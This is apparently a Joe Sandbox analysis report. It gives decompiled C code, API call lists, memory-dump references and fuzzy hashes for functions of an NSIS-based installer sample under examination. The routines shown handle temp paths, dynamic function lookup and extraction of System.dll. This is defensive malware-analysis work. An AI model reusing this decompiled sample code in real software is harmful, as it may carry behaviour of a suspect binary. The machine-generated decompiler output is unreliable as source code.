                                                                                                                                                                                                                            				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                                                                                                                                                                            				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                                                                                                                                                                            					DeleteObject(_t48);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                                                                                                                                                                            					_push(_t63);
                                                                                                                                                                                                                            					E004065AF();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                            • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                                                                                                                            • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E687E16BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                                                                                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                                                                            				_t10 = GlobalAlloc(0x40, _t14);
                                                                                                                                                                                                                            				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                                                                                                                                                            				_t7 = GetProcAddress(_a4, _t10);
                                                                                                                                                                                                                            				GlobalFree(_t10);
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,687E22D8,?,00000808), ref: 687E16D5
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,687E22D8,?,00000808), ref: 687E16DC
                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,687E22D8,?,00000808), ref: 687E16F0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(687E22D8,00000000), ref: 687E16F7
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1700
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1148316912-0
                                                                                                                                                                                                                            • Opcode ID: d5e2a8bef61d3699f892b1c72e422fbcea68f53e99e6bcadd6ef9a23c1bef27a
                                                                                                                                                                                                                            • Instruction ID: b4f3efabdec50f8cb1a741a2f88fc8e81d83d305a0a1bfe1ab25fa728b975e68
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5e2a8bef61d3699f892b1c72e422fbcea68f53e99e6bcadd6ef9a23c1bef27a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F01C722065387BDA3016A7CC4CC9BBEACDF8B2F5B110271F6289229096614C01E7F1
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00405F37(WCHAR* _a4) {
                                                                                                                                                                                                                            				WCHAR* _t9;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t9 = _a4;
                                                                                                                                                                                                                            				_push( &(_t9[lstrlenW(_t9)]));
                                                                                                                                                                                                                            				_push(_t9);
                                                                                                                                                                                                                            				if( *(CharPrevW()) != 0x5c) {
                                                                                                                                                                                                                            					lstrcatW(_t9, 0x40a014);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t9;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                                                                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                            • API String ID: 2659869361-3916508600
                                                                                                                                                                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                            • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E687E10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                                                                                                                                                                            				void* _v0;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                            				void _t81;
                                                                                                                                                                                                                            				void _t82;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *0x687e506c = _a8;
                                                                                                                                                                                                                            				 *0x687e5070 = _a16;
                                                                                                                                                                                                                            				 *0x687e5074 = _a12;
                                                                                                                                                                                                                            				_a12( *0x687e5048, E687E1651, _t73);
                                                                                                                                                                                                                            				_t66 =  *0x687e506c +  *0x687e506c * 4 << 3;
                                                                                                                                                                                                                            				_t27 = E687E12E3();
                                                                                                                                                                                                                            				_v0 = _t27;
                                                                                                                                                                                                                            				_t74 = _t27;
                                                                                                                                                                                                                            				if( *_t27 == 0) {
                                                                                                                                                                                                                            					L28:
                                                                                                                                                                                                                            					return GlobalFree(_t27);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_t29 =  *_t74 & 0x0000ffff;
                                                                                                                                                                                                                            					_t67 = 2;
                                                                                                                                                                                                                            					_t74 = _t74 + _t67;
                                                                                                                                                                                                                            					_t88 = _t29 - 0x66;
                                                                                                                                                                                                                            					if(_t88 > 0) {
                                                                                                                                                                                                                            						_t30 = _t29 - 0x6c;
                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                            							_t31 =  *0x687e5040;
                                                                                                                                                                                                                            							if( *0x687e5040 == 0) {
                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E687E1603( *0x687e5074, _t31 + 4, _t66);
                                                                                                                                                                                                                            							_t34 =  *0x687e5040;
                                                                                                                                                                                                                            							_t86 = _t86 + 0xc;
                                                                                                                                                                                                                            							 *0x687e5040 =  *_t34;
                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                            							GlobalFree(_t34);
                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t36 = _t30 - 4;
                                                                                                                                                                                                                            						if(_t36 == 0) {
                                                                                                                                                                                                                            							L13:
                                                                                                                                                                                                                            							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                                                                                                                                                            							_t74 = _t74 + _t67;
                                                                                                                                                                                                                            							_t34 = E687E1312(E687E135A(_t38));
                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t40 = _t36 - _t67;
                                                                                                                                                                                                                            						if(_t40 == 0) {
                                                                                                                                                                                                                            							L11:
                                                                                                                                                                                                                            							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                                                                                                                                                            							_t74 = _t74 + _t67;
                                                                                                                                                                                                                            							_t34 = E687E1381(_t80, E687E12E3());
                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                            						if(_t40 == 1) {
                                                                                                                                                                                                                            							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                                                                                                                                                                            							_t10 = _t81 + 4; // 0x4
                                                                                                                                                                                                                            							E687E1603(_t10,  *0x687e5074, _t66);
                                                                                                                                                                                                                            							_t86 = _t86 + 0xc;
                                                                                                                                                                                                                            							 *_t81 =  *0x687e5040;
                                                                                                                                                                                                                            							 *0x687e5040 = _t81;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L26;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t88 == 0) {
                                                                                                                                                                                                                            						_t48 =  *0x687e5070;
                                                                                                                                                                                                                            						_t77 =  *_t48;
                                                                                                                                                                                                                            						 *_t48 =  *_t77;
                                                                                                                                                                                                                            						_t49 = _v0;
                                                                                                                                                                                                                            						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                                                                                                                                                                            						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                                                                                                                                                                            							E687E1603(_t49, _t77 + 8, 0x38);
                                                                                                                                                                                                                            							_t86 = _t86 + 0xc;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                                                                                                                                                                            						GlobalFree(_t77);
                                                                                                                                                                                                                            						goto L26;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t54 = _t29 - 0x46;
                                                                                                                                                                                                                            					if(_t54 == 0) {
                                                                                                                                                                                                                            						_t82 = GlobalAlloc(0x40,  *0x687e506c +  *0x687e506c + 8);
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                                                                                                                                                                            						_t14 = _t82 + 8; // 0x8
                                                                                                                                                                                                                            						E687E1603(_t14, _v0, 0x38);
                                                                                                                                                                                                                            						_t86 = _t86 + 0xc;
                                                                                                                                                                                                                            						 *_t82 =  *( *0x687e5070);
                                                                                                                                                                                                                            						 *( *0x687e5070) = _t82;
                                                                                                                                                                                                                            						goto L26;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t63 = _t54 - 6;
                                                                                                                                                                                                                            					if(_t63 == 0) {
                                                                                                                                                                                                                            						goto L23;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t64 = _t63 - 4;
                                                                                                                                                                                                                            					if(_t64 == 0) {
                                                                                                                                                                                                                            						 *_t74 =  *_t74 + 0xa;
                                                                                                                                                                                                                            						goto L13;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t40 = _t64 - _t67;
                                                                                                                                                                                                                            					if(_t40 == 0) {
                                                                                                                                                                                                                            						 *_t74 =  *_t74 + 0xa;
                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                            					L26:
                                                                                                                                                                                                                            				} while ( *_t74 != 0);
                                                                                                                                                                                                                            				_t27 = _v0;
                                                                                                                                                                                                                            				goto L28;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1780285237-0
                                                                                                                                                                                                                            • Opcode ID: 76a610d022264217b7933a6fea25827acba1924e5c3d56c8f82e79cabca72662
                                                                                                                                                                                                                            • Instruction ID: 7e4f4ce89fc49bebf4d045d71a7dd24d2a261aa0ca2bb70690dcb062379b40e5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76a610d022264217b7933a6fea25827acba1924e5c3d56c8f82e79cabca72662
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE5170B5A00205DFDB10DF78DA4EA6977E8FB0A31AB804579F964DB250EB74D940CB70
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                            				int _t17;
                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				signed int _t42;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t29 = __edi;
                                                                                                                                                                                                                            				_t24 = __ebx;
                                                                                                                                                                                                                            				_t14 =  *(_t35 - 0x28);
                                                                                                                                                                                                                            				_t40 = __edx - 0x38;
                                                                                                                                                                                                                            				 *(_t35 - 0x10) = _t14;
                                                                                                                                                                                                                            				_t27 = 0 | _t40 == 0x00000000;
                                                                                                                                                                                                                            				_t32 = _t40 == 0;
                                                                                                                                                                                                                            				if(_t14 == __ebx) {
                                                                                                                                                                                                                            					if(__edx != 0x38) {
                                                                                                                                                                                                                            						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00402DA6(0x21);
                                                                                                                                                                                                                            						E0040668A("C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp", "C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll", 0x400);
                                                                                                                                                                                                                            						_t17 = lstrlenA("C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00402D84(1);
                                                                                                                                                                                                                            					 *0x40adf8 = __ax;
                                                                                                                                                                                                                            					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *(_t35 + 8) = _t17;
                                                                                                                                                                                                                            				if( *_t29 == _t24) {
                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t31 = E004065C8(_t27, _t29);
                                                                                                                                                                                                                            					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
                                                                                                                                                                                                                            						_t14 = E0040620A(_t31, "C:\Users\hardz\AppData\Local\Temp\nsbCCFB.tmp\System.dll",  *(_t35 + 8));
                                                                                                                                                                                                                            						_t42 = _t14;
                                                                                                                                                                                                                            						if(_t42 == 0) {
                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L13;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00402695
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp$C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll
                                                                                                                                                                                                                            • API String ID: 1659193697-3506538004
                                                                                                                                                                                                                            • Opcode ID: 8c6554b53cfcec5e2f07c2cef93b4325bcb2464f26661cdf6029d648463e49ea
                                                                                                                                                                                                                            • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c6554b53cfcec5e2f07c2cef93b4325bcb2464f26661cdf6029d648463e49ea
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00403C25() {
                                                                                                                                                                                                                            				void* _t1;
                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t1 =  *0x40a018; // 0x2a4
                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                            					CloseHandle(_t1);
                                                                                                                                                                                                                            					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t2 =  *0x40a01c; // 0x2a0
                                                                                                                                                                                                                            				if(_t2 != 0xffffffff) {
                                                                                                                                                                                                                            					CloseHandle(_t2);
                                                                                                                                                                                                                            					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                                                                                                                                                            					_t11 =  *0x40a01c;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00403C82();
                                                                                                                                                                                                                            				return E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsbCCFB.tmp", 7);
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000002A4,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000002A0,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp, xrefs: 00403C5B
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp
                                                                                                                                                                                                                            • API String ID: 2962429428-4239285139
                                                                                                                                                                                                                            • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                                                                                                                            • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E0040603F(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                            				int _t11;
                                                                                                                                                                                                                            				signed char* _t12;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				E00406668(0x425f50, _a4);
                                                                                                                                                                                                                            				_t21 = E00405FE2(0x425f50);
                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                            					E004068EF(_t21);
                                                                                                                                                                                                                            					if(( *0x42a278 & 0x00000080) == 0) {
                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                            						_t23 = _t21 - 0x425f50 >> 1;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_t11 = lstrlenW(0x425f50);
                                                                                                                                                                                                                            							_push(0x425f50);
                                                                                                                                                                                                                            							if(_t11 <= _t23) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t12 = E0040699E();
                                                                                                                                                                                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                                                                                                                            								E00405F83(0x425f50);
                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E00405F37();
                                                                                                                                                                                                                            						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t18 =  *_t21;
                                                                                                                                                                                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                                                                                                                            						goto L1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L1:
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
